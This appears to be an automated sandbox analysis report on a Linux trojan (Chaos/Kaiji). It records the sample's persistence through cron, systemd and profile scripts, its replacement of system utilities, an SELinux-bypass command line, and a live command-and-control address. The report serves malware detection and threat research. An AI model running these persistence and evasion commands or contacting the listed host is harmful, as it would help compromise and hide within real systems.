    Source: /usr/bin/pkill (PID: 5685)SIGKILL sent: pid: 5515, result: successfulJump to behavior
    Source: /usr/bin/pkill (PID: 5762)SIGKILL sent: pid: 5691, result: successfulJump to behavior
    Source: /usr/bin/pkill (PID: 5832)SIGKILL sent: pid: 5766, result: successfulJump to behavior
    Source: classification engineClassification label: mal84.spre.troj.evad.linELF@0/29@6/0
    Source: ELF file sectionSubmission: linux_386.elf

    Persistence and Installation Behavior

    barindex
    Source: /tmp/linux_386.elf (PID: 5436)File: /etc/profile.d/bash_config.shJump to behavior
    Source: /usr/bin/bash (PID: 5562)File: /etc/crontabJump to behavior
    Source: /tmp/linux_386.elf (PID: 5429)File: /etc/id.services.conf (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_386.elf (PID: 5429)File: /etc/32678 (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_386.elf (PID: 5436)File: /etc/profile.d/bash_config (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_386.elf (PID: 5436)File: /dev/.oldJump to behavior
    Source: /tmp/linux_386.elf (PID: 5436)File: /dev/.imgJump to behavior
    Source: /tmp/linux_386.elf (PID: 5436)File: /.imgJump to behavior
    Source: /etc/id.services.conf (PID: 5835)File: /dev/.oldJump to behavior
    Source: /etc/id.services.conf (PID: 5835)File: /dev/.imgJump to behavior
    Source: /etc/id.services.conf (PID: 5767)File: /dev/.oldJump to behavior
    Source: /etc/id.services.conf (PID: 5767)File: /dev/.imgJump to behavior
    Source: /etc/id.services.conf (PID: 5690)File: /dev/.oldJump to behavior
    Source: /etc/id.services.conf (PID: 5690)File: /dev/.imgJump to behavior
    Source: /boot/System.img.config (PID: 5514)File: /dev/.oldJump to behavior
    Source: /boot/System.img.config (PID: 5514)File: /dev/.imgJump to behavior
    Source: /boot/System.img.config (PID: 5514)Empty hidden file: /dev/.oldJump to behavior
    Source: /boot/System.img.config (PID: 5514)Empty hidden file: /dev/.imgJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/230/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/230/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/110/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/110/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/231/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/231/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/111/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/111/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/232/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/232/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/112/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/112/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/233/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/233/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/113/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/113/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/234/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/234/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/114/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/114/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/235/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/235/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/115/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/115/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/236/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/236/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/116/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/116/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/237/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/237/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/117/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/117/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/238/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/238/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/118/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/118/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/239/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/239/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/119/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/119/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/914/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/914/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/10/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/10/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/917/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/917/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/11/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/11/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/12/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/12/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/13/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/13/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/14/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/14/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/15/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/15/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/16/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/16/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/17/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/17/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/18/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/18/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/19/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/19/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/240/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/240/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/3095/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/3095/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/120/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/120/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/241/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/241/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/121/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/121/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/242/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/242/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/1/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/1/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/122/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/122/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/243/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/243/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/2/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/2/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/123/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/123/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/244/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/244/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/3/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/3/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/124/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/124/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/245/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/245/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/1588/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/1588/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/125/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/125/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/4/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/4/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/246/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/246/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/126/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/126/cmdlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/5/statusJump to behavior
    Source: /usr/bin/pkill (PID: 5685)File opened: /proc/5/cmdlineJump to behavior
    Source: /tmp/linux_386.elf (PID: 5434)Shell command executed: /bin/bash -c /etc/32678&Jump to behavior
    Source: /tmp/linux_386.elf (PID: 5471)Shell command executed: /bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable linux.service;systemctl start linux.service;journalctl -xe --no-pager"Jump to behavior
    Source: /tmp/linux_386.elf (PID: 5538)Shell command executed: /bin/bash -c "cd /boot;ausearch -c 'System.img.conf' --raw | audit2allow -M my-Systemimgconf;semodule -X 300 -i my-Systemimgconf.pp"Jump to behavior
    Source: /usr/sbin/cron (PID: 5661)Shell command executed: /bin/sh -c "/.img "Jump to behavior
    Source: /usr/sbin/cron (PID: 5728)Shell command executed: /bin/sh -c "/.img "
    Source: /usr/sbin/cron (PID: 5812)Shell command executed: /bin/sh -c "/.img "
    Source: /usr/sbin/cron (PID: 5871)Shell command executed: /bin/sh -c "/.img "
    Source: /boot/System.img.config (PID: 5507)Pkill executable: /usr/bin/pkill -> pkill -9 32678Jump to behavior
    Source: /etc/id.services.conf (PID: 5685)Pkill executable: /usr/bin/pkill -> pkill -9 32678Jump to behavior
    Source: /etc/id.services.conf (PID: 5762)Pkill executable: /usr/bin/pkill -> pkill -9 32678Jump to behavior
    Source: /etc/id.services.conf (PID: 5832)Pkill executable: /usr/bin/pkill -> pkill -9 32678Jump to behavior
    Source: /usr/sbin/service (PID: 5435)Systemctl executable: /usr/bin/systemctl -> systemctl start crond.serviceJump to behavior
    Source: /usr/sbin/service (PID: 5451)Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.targetJump to behavior
    Source: /usr/sbin/service (PID: 5457)Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socketJump to behavior
    Source: /usr/sbin/update-rc.d (PID: 5455)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
    Source: /bin/bash (PID: 5472)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
    Source: /bin/bash (PID: 5478)Systemctl executable: /usr/bin/systemctl -> systemctl enable linux.serviceJump to behavior
    Source: /bin/bash (PID: 5492)Systemctl executable: /usr/bin/systemctl -> systemctl start linux.serviceJump to behavior
    Source: /usr/sbin/service (PID: 5586)Systemctl executable: /usr/bin/systemctl -> systemctl start cron.serviceJump to behavior
    Source: /usr/sbin/service (PID: 5603)Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.targetJump to behavior
    Source: /usr/sbin/service (PID: 5609)Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socketJump to behavior
    Source: /tmp/linux_386.elf (PID: 5623)Systemctl executable: /usr/bin/systemctl -> systemctl start crond.serviceJump to behavior
    Source: /usr/sbin/service (PID: 5834)Systemctl executable: /usr/bin/systemctl -> systemctl start crond.serviceJump to behavior
    Source: /usr/sbin/service (PID: 5847)Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.targetJump to behavior
    Source: /usr/sbin/service (PID: 5849)Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socketJump to behavior
    Source: /usr/sbin/service (PID: 5765)Systemctl executable: /usr/bin/systemctl -> systemctl start crond.serviceJump to behavior
    Source: /usr/sbin/service (PID: 5781)Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.targetJump to behavior
    Source: /usr/sbin/service (PID: 5783)Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socketJump to behavior
    Source: /usr/sbin/service (PID: 5689)Systemctl executable: /usr/bin/systemctl -> systemctl start crond.serviceJump to behavior
    Source: /usr/sbin/service (PID: 5698)Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.targetJump to behavior
    Source: /usr/sbin/service (PID: 5700)Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socketJump to behavior
    Source: /usr/sbin/service (PID: 5513)Systemctl executable: /usr/bin/systemctl -> systemctl start crond.serviceJump to behavior
    Source: /usr/sbin/service (PID: 5531)Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.targetJump to behavior
    Source: /usr/sbin/service (PID: 5533)Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socketJump to behavior
    Source: /tmp/linux_386.elf (PID: 5429)File: /etc/id.services.conf (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_386.elf (PID: 5429)File: /etc/32678 (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_386.elf (PID: 5436)File: /boot/System.img.config (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_386.elf (PID: 5436)File: /etc/profile.d/bash_config (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_386.elf (PID: 5436)File: /usr/lib/libdlrpcld.so (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_386.elf (PID: 5436)File: /usr/lib/system-monitor (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_386.elf (PID: 5436)File: /usr/bin/ps (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_386.elf (PID: 5436)File: /usr/bin/ss (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_386.elf (PID: 5436)File: /usr/bin/ls (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_386.elf (PID: 5436)File: /usr/bin/dir (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_386.elf (PID: 5436)File: /usr/bin/netstat (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_386.elf (PID: 5436)File: /usr/bin/find (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_386.elf (PID: 5436)File: /usr/bin/lsof (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_386.elf (PID: 5429)Writes shell script file to disk with an unusual file extension: /etc/32678Jump to dropped file
    Source: /tmp/linux_386.elf (PID: 5436)Writes shell script file to disk with an unusual file extension: /etc/init.d/linux_killJump to dropped file
    Source: /tmp/linux_386.elf (PID: 5436)Writes shell script file to disk with an unusual file extension: /.imgJump to dropped file
    Source: /tmp/linux_386.elf (PID: 5436)Writes shell script file to disk with an unusual file extension: /etc/init.d/sshJump to dropped file
    Source: /tmp/linux_386.elf (PID: 5436)Shell script file created: /etc/profile.d/bash_config.shJump to dropped file
    Source: /usr/sbin/service (PID: 5458)Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/pJump to behavior
    Source: /usr/sbin/service (PID: 5610)Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/pJump to behavior
    Source: /usr/sbin/service (PID: 5850)Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/pJump to behavior
    Source: /usr/sbin/service (PID: 5784)Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/pJump to behavior
    Source: /usr/sbin/service (PID: 5701)Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/pJump to behavior
    Source: /usr/sbin/service (PID: 5534)Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/pJump to behavior

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: /tmp/linux_386.elf (PID: 5436)File: /etc/init.d/linux_killJump to dropped file
    Source: /tmp/linux_386.elf (PID: 5436)File: /etc/init.d/sshJump to dropped file
    Source: unknownNetwork traffic detected: HTTP traffic on port 48720 -> 808
    Source: unknownNetwork traffic detected: HTTP traffic on port 808 -> 48720
    Source: /etc/32678 (PID: 5448)Sleep executable: /usr/bin/sleep -> sleep 60Jump to behavior
    Source: /etc/32678 (PID: 5530)Sleep executable: /usr/bin/sleep -> sleep 60Jump to behavior
    Source: /etc/32678 (PID: 5696)Sleep executable: /usr/bin/sleep -> sleep 60Jump to behavior
    Source: /etc/32678 (PID: 5779)Sleep executable: /usr/bin/sleep -> sleep 60Jump to behavior
    Source: /etc/32678 (PID: 5845)Sleep executable: /usr/bin/sleep -> sleep 60Jump to behavior
    Source: /usr/bin/pkill (PID: 5507)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/bin/pkill (PID: 5762)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/bin/pkill (PID: 5832)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/bin/sleep (PID: 5448)Sleeps longer then 60s: 60.0sJump to behavior
    Source: /usr/bin/sleep (PID: 5530)Sleeps longer then 60s: 60.0sJump to behavior
    Source: /usr/bin/sleep (PID: 5696)Sleeps longer then 60s: 60.0sJump to behavior
    Source: /usr/bin/sleep (PID: 5779)Sleeps longer then 60s: 60.0sJump to behavior
    Source: /usr/bin/sleep (PID: 5845)Sleeps longer then 60s: 60.0sJump to behavior
    Source: /usr/sbin/cron (PID: 5619)Sleeps longer then 60s: 60.0sJump to behavior
    Source: /usr/sbin/cron (PID: 5674)Sleeps longer then 60s: 60.0s
    Source: /usr/sbin/cron (PID: 5749)Sleeps longer then 60s: 60.0s
    Source: /usr/sbin/cron (PID: 5749)Sleeps longer then 60s: 60.0s
    Source: /usr/sbin/cron (PID: 5818)Sleeps longer then 60s: 60.0s
    Source: /usr/sbin/cron (PID: 5877)Sleeps longer then 60s: 60.0s
    Source: /tmp/linux_386.elf (PID: 5429)Queries kernel information via 'uname': Jump to behavior
    Source: /bin/bash (PID: 5434)Queries kernel information via 'uname': Jump to behavior
    Source: /tmp/linux_386.elf (PID: 5436)Queries kernel information via 'uname': Jump to behavior
    Source: /bin/bash (PID: 5471)Queries kernel information via 'uname': Jump to behavior
    Source: /bin/bash (PID: 5538)Queries kernel information via 'uname': Jump to behavior
    Source: /usr/bin/bash (PID: 5562)Queries kernel information via 'uname': Jump to behavior

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: linux_386.elf, type: SAMPLE

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: linux_386.elf, type: SAMPLE
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information2
    Scripting
    Valid Accounts1
    Command and Scripting Interpreter
    1
    Unix Shell Configuration Modification
    1
    Unix Shell Configuration Modification
    1
    Masquerading
    1
    OS Credential Dumping
    1
    Security Software Discovery
    Remote ServicesData from Local System11
    Non-Standard Port
    Exfiltration Over Other Network Medium1
    Data Manipulation
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    Systemd Service
    1
    Systemd Service
    1
    Hide Artifacts
    LSASS Memory1
    Virtualization/Sandbox Evasion
    Remote Desktop ProtocolData from Removable Media1
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAt2
    Scripting
    Logon Script (Windows)1
    Virtualization/Sandbox Evasion
    Security Account Manager1
    File and Directory Discovery
    SMB/Windows Admin SharesData from Network Shared Drive2
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    File and Directory Permissions Modification
    NTDS1
    System Information Discovery
    Distributed Component Object ModelInput Capture2
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Disable or Modify Tools
    LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    Hidden Files and Directories
    Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    No configs have been found
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Number of created Files
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562731 Sample: linux_386.elf Startdate: 25/11/2024 Architecture: LINUX Score: 84 145 aras.liveya.org 103.135.101.78, 38944, 48720, 52462 TH-AS-APTianhaiInfoTechCN Hong Kong 2->145 147 www.google.com 2->147 149 daisy.ubuntu.com 2->149 153 Multi AV Scanner detection for submitted file 2->153 155 Yara detected Chaos 2->155 157 Machine Learning detection for sample 2->157 159 2 other signatures 2->159 15 linux_386.elf 2->15         started        19 systemd System.img.config 2->19         started        21 systemd cron 2->21         started        23 17 other processes 2->23 signatures3 process4 file5 143 /etc/32678, POSIX 15->143 dropped 151 Sample tries to set files in /etc globally writable 15->151 25 linux_386.elf linux_386.elf 15->25         started        29 linux_386.elf service systemctl 15->29         started        31 linux_386.elf bash 15->31         started        33 System.img.config sh 19->33         started        35 System.img.config service systemctl 19->35         started        41 2 other processes 19->41 37 cron 21->37         started        39 cron 23->39         started        43 8 other processes 23->43 signatures6 process7 file8 133 /etc/profile.d/bash_config.sh, a 25->133 dropped 135 /etc/init.d/ssh, POSIX 25->135 dropped 137 /etc/init.d/linux_kill, POSIX 25->137 dropped 139 /.img, a 25->139 dropped 161 Sample tries to set files in /etc globally writable 25->161 163 Sample tries to persist itself using /etc/profile 25->163 165 Drops files in suspicious directories 25->165 45 linux_386.elf bash 25->45         started        57 7 other processes 25->57 59 4 other processes 29->59 49 bash 32678 31->49         started        51 sh 32678 33->51         started        61 4 other processes 35->61 53 cron sh 37->53         started        55 cron sh 39->55         started        63 2 other processes 43->63 signatures9 process10 file11 141 /etc/crontab, ASCII 45->141 dropped 167 Sample tries to persist itself using cron 45->167 65 32678 sleep 49->65         started        67 32678 id.services.conf 51->67         started        69 32678 sleep 51->69         started        71 sh 53->71         started        73 sh 55->73         started        75 12 other processes 57->75 77 2 other processes 59->77 79 2 other processes 61->79 81 2 other processes 63->81 signatures12 process13 process14 83 id.services.conf sh 67->83         started        85 id.services.conf service systemctl 67->85         started        87 id.services.conf pkill 67->87         started        89 id.services.conf id.services.conf 67->89         started        91 service systemctl 75->91         started        93 service sed 75->93         started        process15 95 sh 32678 83->95         started        97 service 85->97         started        99 service basename 85->99         started        101 service basename 85->101         started        103 service systemctl 85->103         started        process16 105 32678 id.services.conf 95->105         started        107 32678 sleep 95->107         started        109 service systemctl 97->109         started        111 service sed 97->111         started        process17 113 id.services.conf sh 105->113         started        115 id.services.conf service systemctl 105->115         started        117 id.services.conf pkill 105->117         started        119 id.services.conf id.services.conf 105->119         started        process18 121 sh 32678 113->121         started        123 service 115->123         started        125 service basename 115->125         started        127 service basename 115->127         started        129 service systemctl 115->129         started        process19 131 32678 sleep 121->131         started       
    SourceDetectionScannerLabelLink
    linux_386.elf55%ReversingLabsLinux.Trojan.Kaiji
    linux_386.elf100%Joe Sandbox ML
    SourceDetectionScannerLabelLink
    /.img0%ReversingLabs
    /etc/326780%ReversingLabs
    /etc/init.d/linux_kill0%ReversingLabs
    /etc/init.d/ssh0%ReversingLabs
    /etc/profile.d/bash_config.sh0%ReversingLabs
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://103.135.101.78:808/password.txt0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    aras.liveya.org
    103.135.101.78
    truetrue
      unknown
      daisy.ubuntu.com
      162.213.35.25
      truefalse
        high
        www.google.com
        142.250.181.100
        truefalse
          high
          NameMaliciousAntivirus DetectionReputation
          http://103.135.101.78:808/password.txttrue
          • Avira URL Cloud: safe
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://www.baidu.com/search/spider.html)linux_386.elffalse
            high
            http://search.msn.com/msnbot.htmlinux_386.elffalse
              high
              http://www.baidu.com/search/spider.html)000102030405060708091011121314151617181920212223242526272829linux_386.elffalse
                high
                https://www.so.com/s?q=indexlinux_386.elffalse
                  high
                  http://help.yahoo.com/help/us/ysearch/slurp)x509:linux_386.elffalse
                    high
                    http://www.google.com/mobile/adsbot.html)linux_386.elffalse
                      high
                      http://www.huaweisymantec.com/cn/IRL/spider)Mozilla/5.0linux_386.elffalse
                        high
                        http://www.baidu.com/search/spider.html)http2:linux_386.elffalse
                          high
                          http://yandex.com/bots)http:linux_386.elffalse
                            high
                            http://www.baidu.com/search/spider.html)Mozilla/5.0linux_386.elffalse
                              high
                              http://www.entireweb.com/about/search_tech/speedy_spider/)text/htmllinux_386.elffalse
                                high
                                http://www.haosou.com/help/help_3_2.htmlMozilla/5.0linux_386.elffalse
                                  high
                                  https://www.baidu.com/s?wd=insufficientlinux_386.elffalse
                                    high
                                    http://www.youdao.com/help/webmaster/spider/;)reflect:linux_386.elffalse
                                      high
                                      https://search.yahoo.com/search?p=illegallinux_386.elffalse
                                        high
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        103.135.101.78
                                        aras.liveya.orgHong Kong
                                        4842TH-AS-APTianhaiInfoTechCNtrue
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        103.135.101.78linux_arm6.elfGet hashmaliciousChaosBrowse
                                        • 103.135.101.78:808/password.txt
                                        linux_ppc64el.elfGet hashmaliciousChaosBrowse
                                        • 103.135.101.78:808/password.txt
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        daisy.ubuntu.comfbot.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 162.213.35.24
                                        fbot.ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 162.213.35.25
                                        fbot.spc.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 162.213.35.24
                                        fbot.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 162.213.35.25
                                        fbot.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 162.213.35.24
                                        fbot.arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 162.213.35.25
                                        fbot.arm6.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 162.213.35.25
                                        fbot.mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 162.213.35.24
                                        fbot.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 162.213.35.24
                                        fbot.x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 162.213.35.25
                                        aras.liveya.orglinux_arm6.elfGet hashmaliciousChaosBrowse
                                        • 103.135.101.78
